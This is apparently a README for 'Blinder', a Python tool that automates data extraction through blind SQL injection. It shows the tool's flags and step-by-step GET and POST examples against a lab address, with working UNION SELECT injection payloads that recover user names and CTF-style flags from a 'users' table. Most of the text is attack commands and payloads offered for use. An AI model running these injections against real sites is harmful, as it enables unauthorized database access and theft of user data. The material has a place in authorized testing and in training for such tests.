Have you found a blind SQL injection? Great! Now you need to export it, but are you too lazy to sort through the values? Most likely, Blinder will help you!
Blinder is a tool that iterates through the values by letter. FUZZ is used to indicate the location of the search.
[HELP PAGE]
Usage: python3 blinder.py -u [URL] -v [GET/URL] -p [PARAMETERS]
Flags:
[-h] [--help]: help page.
[--url] [-u]: url to target.
[-v] [--verbs]: HTTP verb (GET, POST, PUT and etc...).
[-p] [--parameters]: parameters for the target.
[-sl] [--show_length]: show response length.
[-il] [--incorrect_length]: size of incorrect length (for the filtration).
[-ec] [--exclude_characters]: Exclude characters from the fuzzing list. Specify sequentially in a line
By default: [',&,%]
[-hg] [--hide-greeting]: Hide greeting.
[-ta] [--to-ascii]: Convert characters to ascii code.
[-ap] [--add-percent]: Add a percent sign to the end of FUZZ.
In this mode, other characters can be added to the end of the line. These signs may be incorrect, due to the percentage.
[-tl] [--to-lower]: Convert letters to lowercase
[--hack]: Specify the URL of the target after the --hack flag, and it will be hacked.
Let's specify the URL through the flag [-u]
, and the verb through [-v]
. Our request will look like this: . To make it work fine, add a percentage to the end of the line using the [-ap]
flag. We want to see the length of the request. Let's add the [-sl]
flag.
./blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'FUZZ' -- -", -v GET
-sl -ap
The end of result will be as follows:
We realized that the length 117
can be specified as incorrect. The letters will be converted to lowercase using the [-tl]
flag, because we found upper and lower case letters. Specify the first letter m
. In order for Blinder to fuzz recursively, we need to specify the wrong length 117 through [-ic]
and remove the [-sl]
flag.
/blinder.py -u "http://192.168.0.100:7777/index.php?id=' union select id,name from users where name like 'mFUZZ' -- -", -v GET -ap -il 117 -tl
Let's connect the letter m
and the result of Blinder:
my_first_flag
In a post request, parameters are not passed through ?. There is a [-p]
flag in Blinder for this request. We will specify the parameters using the [-p]
flag. The rest of the flags, as in the get request.
./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'FUZZ' -- -" -sl -ap
The end of result will be as follows:
We realized that the length 184
can be specified as incorrect. The letters will be converted to lowercase using the [-tl]
flag, because we found upper and lower case letters. Specify the first letter f
. In order for Blinder to fuzz recursively, we need to specify the wrong length 184 through [-ic]
and remove the [-sl]
flag.
./blinder.py -u "http://192.168.0.100:7777/index_post.php" -v POST -p "id=100' union select id,name from users where name like 'fFUZZ' -- -" -il 184 -ap -tl
Let's connect the letter f
and the result of Blinder:
flag